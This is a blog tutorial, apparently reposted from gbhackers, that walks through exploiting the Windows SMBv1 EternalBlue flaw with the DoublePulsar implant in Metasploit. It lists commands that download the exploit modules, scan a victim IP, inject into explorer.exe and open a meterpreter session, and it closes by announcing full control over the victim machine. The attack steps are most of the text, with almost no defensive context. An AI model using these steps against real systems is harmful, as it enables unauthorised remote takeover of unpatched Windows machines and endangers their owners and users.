EternalBlue Malware Developed by National Security Agency (NSA) exploiting Windows based Server Message Block (SMBv1) and to be believed the tool has released by Shadow Brokers hackers Group in April 2017 and it has been used for Wannacry Cyber Attack.

SMB version 1 (SMBv1) in various versions of Microsoft Windows accepts specially crafted packets from remote attackers, which is the reason for this vulnerability existed with windows os which leads to perform Remote Code Execution which was particularly targeted Windows 7 and XP.

The NSA Tool Called DOUBLEPULSAR that is designed to provide covert, backdoor access to a Windows system, have been immediately received by Attackers.

Once installed, DOUBLEPULSAR  waits for certain types of data to be sent over port 445. When DOUBLEPULSAR  arrives, the implant provides a distinctive response.

EternalBlue Live Demonstration using Metasploit

We need to download and add the Scanner and exploit to Metasploit. Open your Terminal windows and Type following commands.

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

EternalBlue

Move file smb_ms17_010.rb under the folder use/share/metasploit-framework/modules/auxiliary/scanner/smb

EternalBlue

And then you should copy Eternal Blue-Doublepulsar.rb and debs to under use/share/metasploit-framework/modules/exploits/windows/smb

EternalBlue

Now Open the Eternal Blue-Doublepulsar.rb with any Editor and change the path directory for ETERNALBLUE and DOUBLEPULSAR to smb exploit directory use/share/metasploit-framework/modules/exploits/windows/smb.

Then we should specify the name of the process to be injected, we have specified here as explorer.exe

EternalBlue

Then you should launch msfconsole and use the auxiliary scan module  smb_ms17_010.rb.

> use auxiliary/scanner/smb/smb_ms17_010
> show options

EternalBlue

Now you should setup RHOSTS IP which is the Victims Ip address.

> set RHOSTS IP
> run

EternalBlue

It will go and check whether the host is vulnerable or not and also display the victim machine details.

Now we can move to the exploit EternalBlue & Double Pulsar

use exploit/windows/smb/eternalblue_doublepulsar
> set payload windows.x64/meterpreter/bind_tcp

> show options

EternalBlue

Then set a target architecture and then RHOST Victim IP address.

> setRHOST IP
> set targetarchitecture x64
> show options

EternalBlue

EternalBlue

And then type exploit and hit enter.

EternalBlue

It’s done now we have got the meterpreter session and the vulnerability has been exploited.

EternalBlue

Now the system has been exploited successfully and we have full control over the victim machine now.

(Fuente: https://gbhackers.com/windows-eternalblue-doublepulsar/)

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Información básica sobre protección de datos

  • Responsable Domingo Aguinaco Parejo .
  • Finalidad Moderar los comentarios. Responder las consultas.
  • Legitimación Tu consentimiento.
  • Destinatarios Domingo Aguinaco Parejo.
  • Derechos Acceder, rectificar y suprimir los datos.
  • Información Adicional Puedes consultar la información detallada en el Aviso Legal.